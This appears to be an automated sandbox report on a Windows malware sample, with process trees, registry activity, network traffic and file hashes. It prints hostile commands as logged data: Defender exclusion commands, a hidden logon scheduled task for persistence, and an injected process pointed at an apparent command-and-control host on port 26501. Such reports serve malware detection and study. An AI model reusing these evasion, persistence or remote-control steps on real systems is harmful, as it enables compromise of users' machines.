| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\custom1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1840 set thread context of 2596 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{27B3FDD4-55CD-4F09-B05D-D07610C2AB8E} | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\custom1.exe
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ffxuozsf\ffxuozsf.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES838.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC54962C1D5784C8DA6A081BE9CE49B4C.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4561.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39b2855 /state1:0x41c64e6d
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.1.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 5.1.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 104.26.1.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 17.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:49876 | tcp | |
| N/A | 127.0.0.1:49878 | tcp | |
| N/A | 127.0.0.1:49890 | tcp | |
| N/A | 127.0.0.1:49892 | tcp | |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | a4a31e7c630a3e4d6051ea116269a48b |
| SHA1 | 2c95c0ab5bf63583606b970d24802d0ee3b6b3d0 |
| SHA256 | 924c1c072b76efdf126c5b586004709ada59d95464d4015f9bc7f072f17c3071 |
| SHA512 | dd6d6ae8817d19e27a71bc8f05197fc7baf7e8c31b34edd5fc6ad63a45e579b922b84a9ef58ee60377668b760b15fcabc704331e2c68c52b4330c3248eac7cb0 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | fb2217b982a51ca9dfbcc4d9e79ad147 |
| SHA1 | 746f784d16f2e57aa03310c1ece1b7ce1d28497d |
| SHA256 | 507cb4c8600f18c4710be2752bcd3f428bd9199569cac8e28db006ce7a463929 |
| SHA512 | 9fe5f797597eccc34449687d8f0b7c6e9622f10cc8ece218fb8e810a60f93b157aa07fd3d6382349a0cf1ff60d5f51f4058bad472e3bdf197d809a321fdc401b |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 9ac5e5e6a3e7594fd49de7837f2cd3ea |
| SHA1 | c1105cc8bffb3a51d729b5116ae43c2e1eb81fd1 |
| SHA256 | 0c9d3c2ac2a90331f7e2b8c679efea78841dd33292c23591f21d6a88d6884d75 |
| SHA512 | bc67e311ba9279d37c0883227f150799c15c27f32a3406a1d026df1b44300ff38e1e8a0ea77869a057e0bf0c40e8a54141c98444fbdb42406d19b967a845c901 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 558457f9547cbbb39d34c04653cb36a5 |
| SHA1 | 5cfb94b139e3e87adbd8e77f4d434e07ab5ba90d |
| SHA256 | d7d07a880eb28ff36e3b25e92ae0155b25403c8a50df1ec49f127249008ba13a |
| SHA512 | 01fde93ca3faba9c8c54c125886c82c04244f18a259509e4afeb41f77a6c9003e5ad658786d362ea1e1380e068b97360dbc6a9c65a26a4503283a8ad23cdab65 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | ffc387c92017014fb8659c7329d94367 |
| SHA1 | e5372ac69aba48d61ca0986f06572bfdfa4362a7 |
| SHA256 | 24150bb03de895a8729a38e15d992b4d0c78044aa958fb252419794d0da02785 |
| SHA512 | f0713132cf495b30c7a4aac048457ccd830899c0b25a656b41c8775c0f979a098f3426e80527fe6b8534649747233751c1cb83274d8b13b7836b92040bb1b117 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 34aba8b9c6bf59cb64210dea260c965d |
| SHA1 | 48bf9ede9e5ec9d8d5d3a7662158305ee9b50939 |
| SHA256 | 3b5c53495c4a38a0fdc67e57eac00c914f4f2b4ee42b76932557012eab43c378 |
| SHA512 | 39d1051ced8cfddfdc661362bbc5d3cf3c971304c7c8c668aeb944932a93f541d61e888c518673e36414cde004d9b9a09e007a25d3f994cc65edef0d7dc907cf |
memory/112-20-0x0000000000CD0000-0x0000000001310000-memory.dmp
memory/112-21-0x0000000073500000-0x0000000073CB0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 5ffb2b14e4a70eee3dcef427e296b5e7 |
| SHA1 | e2bbad28f116d3ef1898fdd74dc0a9aadf644fa8 |
| SHA256 | d9ef2803f96930eda032541a145e8d66d447210920b239bed84424142794a0cf |
| SHA512 | 26e3e297163e5eb7ffc6e2467998f517e033b5e7bff4c446c158b6c6ad201daec79000991f6d59a3ca7b082d200663a1f1ba787978d55188c2940af27bf675b2 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 6239d11b49526790f4c67e7d269fba3c |
| SHA1 | 6f8fad15f6525e354e53a8ac3f32816162992f1f |
| SHA256 | b18ca03fa4584b2c8b802dda4cad6445c855b91ff1d881531fbb36b32a9ca235 |
| SHA512 | 794209ba6ef2537fea4d4d253f5d430088abe75624168827a9b973732f959d50e149ad6def1ef42b231be498f5587c1282eab7ca9319e0c61868d91f4e88e3fb |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | d00fe7ae5bb20dfb9cf36f395415864e |
| SHA1 | 6c792a4722d8f4a3d751a5ec2abd83671439bb0c |
| SHA256 | dd56f06f520b6c3d99ca01fa8213684583bba2a8efc4c0b2eb625b7ab94452b0 |
| SHA512 | da2b05edefb42f27bb5d881c8928dc0a1de84b617a7cb609fa2d8c33963c3cda661fc432f523a1e23b28fc4a959776eeac05a1ab638aa1a4fab5653344a9f511 |
memory/4888-37-0x00007FF697560000-0x00007FF69799C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 6e341cabcf34957160978a08a77a1271 |
| SHA1 | 8c6465abf03f43d8984163a5973f12d28293436a |
| SHA256 | 717532ad4f42381a497df422d7a0d69700dd656e3dd5846e630e66bcfdc66a20 |
| SHA512 | 1692ee455e83c8b9629fc2414f20537df7393a6e98a726e4bbf56ec65d64fa766015e121f5c72506039e2bfbe4a1ae17bbda61c0f81af5a64fd7c6966e159343 |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 9df421ba2a2bc886f33b7cc73d3e23f1 |
| SHA1 | 2dbfaac2e682aae21d01424e1b37da4f37fb4ed4 |
| SHA256 | 6d3b1bace350a441c3163295bb3fc227bbe01ce5cf0646edc878d68b0174c002 |
| SHA512 | 4d3309ec76c69185dcd7d749194bfe1e8656981e3fcea8f1293c8fcfd3a6ceb57ac2232a1c674854ff893ec2dd095eb0830ee738620c3d00bc2fa9e22e50b8c5 |
memory/1840-41-0x00000000001D0000-0x0000000000252000-memory.dmp
memory/1840-43-0x0000000004AE0000-0x0000000004B7C000-memory.dmp
memory/1840-42-0x0000000073500000-0x0000000073CB0000-memory.dmp
memory/1840-44-0x0000000004B80000-0x0000000004C12000-memory.dmp
memory/1840-45-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
memory/1840-46-0x0000000006780000-0x0000000006D24000-memory.dmp
memory/112-50-0x0000000005D20000-0x0000000005D30000-memory.dmp
memory/2596-58-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2596-59-0x0000000073500000-0x0000000073CB0000-memory.dmp
memory/2596-60-0x0000000004FA0000-0x0000000004FB0000-memory.dmp
memory/1840-62-0x0000000073500000-0x0000000073CB0000-memory.dmp
memory/2788-63-0x0000000000360000-0x0000000000368000-memory.dmp
memory/2788-66-0x00007FFEAA240000-0x00007FFEAAD01000-memory.dmp
memory/112-67-0x0000000005F60000-0x0000000005F82000-memory.dmp
memory/112-68-0x0000000006000000-0x0000000006066000-memory.dmp
memory/1596-69-0x0000000073500000-0x0000000073CB0000-memory.dmp
memory/548-72-0x0000000003490000-0x00000000034A0000-memory.dmp
memory/1596-71-0x0000000000E50000-0x0000000000E86000-memory.dmp
memory/548-73-0x0000000005B10000-0x0000000006138000-memory.dmp
memory/1596-70-0x0000000002C60000-0x0000000002C70000-memory.dmp
memory/548-74-0x0000000073500000-0x0000000073CB0000-memory.dmp
memory/1596-75-0x0000000002C60000-0x0000000002C70000-memory.dmp
memory/112-76-0x0000000073500000-0x0000000073CB0000-memory.dmp
memory/1596-77-0x0000000005240000-0x0000000005262000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f43gn3rq.2gw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/548-78-0x0000000006290000-0x00000000062F6000-memory.dmp
memory/1596-98-0x0000000005A50000-0x0000000005DA4000-memory.dmp
memory/1596-102-0x0000000005FC0000-0x0000000005FDE000-memory.dmp
memory/548-105-0x0000000006E20000-0x0000000006E6C000-memory.dmp
memory/112-106-0x0000000073500000-0x0000000073CB0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp4561.tmp.bat
| MD5 | 25beaf1b8ff84f702e75236f1c888c0f |
| SHA1 | f3782bbe34fa5a88a0d275cd5c0e2dc0677890c1 |
| SHA256 | af6367be2bbb88651f3e2932f9665ef3d099975a7912203e115358693d828907 |
| SHA512 | b8437b22d91c1ccb5c7b4b05dde67fa2a46a411e338ba718793691bcd4ae1f2b38ac23ed2855f340a5129386b779eb4404bcd3b9700b3028d4821a24625e5f28 |
memory/2324-112-0x00000000031D0000-0x00000000031D1000-memory.dmp
memory/5352-115-0x000001DB070C0000-0x000001DB070E0000-memory.dmp
memory/5352-119-0x000001DB07600000-0x000001DB07620000-memory.dmp
memory/5352-121-0x000001DB07770000-0x000001DB07790000-memory.dmp
memory/548-129-0x0000000003490000-0x00000000034A0000-memory.dmp
memory/4888-130-0x00007FF697560000-0x00007FF69799C000-memory.dmp
memory/1596-131-0x0000000002C60000-0x0000000002C70000-memory.dmp
memory/1596-133-0x00000000065E0000-0x0000000006612000-memory.dmp
memory/548-136-0x000000006F6C0000-0x000000006F70C000-memory.dmp
memory/1596-134-0x000000006F6C0000-0x000000006F70C000-memory.dmp
memory/1596-132-0x000000007F850000-0x000000007F860000-memory.dmp
memory/548-135-0x000000007F720000-0x000000007F730000-memory.dmp
memory/1596-155-0x0000000006570000-0x000000000658E000-memory.dmp
memory/1596-156-0x0000000006FF0000-0x0000000007093000-memory.dmp
memory/1596-157-0x0000000073500000-0x0000000073CB0000-memory.dmp
memory/548-159-0x0000000073500000-0x0000000073CB0000-memory.dmp
memory/4888-158-0x00007FF697560000-0x00007FF69799C000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
| MD5 | 599a5b3c66a0c41d2c3cb1ffe2704fd8 |
| SHA1 | df4eeeb35420f78442d014eca4d677217f2accd2 |
| SHA256 | 039040204692d2b45e80dcb537444906bef18fc03fdc2155de3eb500b86f604f |
| SHA512 | fb8f0a136b0ec2b5bfe71103dbda6a73285a9793472a69fae717d63a0084e3c2b69980e32dfa9b22c850c554fe3e77b0599b0d3b614da89a8d936a11ca05fd52 |
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
| MD5 | f52e9c25194408e3207b0aad1af6c3ce |
| SHA1 | 9582dadacb78f4c2ab8ef14ee306d449a02db082 |
| SHA256 | 0af144d8915477e70fb1b1d159456cd22383a3da1bb522fd7eb8e6035359aeee |
| SHA512 | 40d0c4eb85f3364ea3de9f2850790ca2cc39e8b8ddc641cedf9cfb9da6b88acdeb3f7cfbc3f0e714ab5a1fe54cf57ecb7d411f363cba1e918b3f5fdda65c0d10 |
memory/2596-163-0x0000000073500000-0x0000000073CB0000-memory.dmp
memory/2788-164-0x00007FFEAA240000-0x00007FFEAAD01000-memory.dmp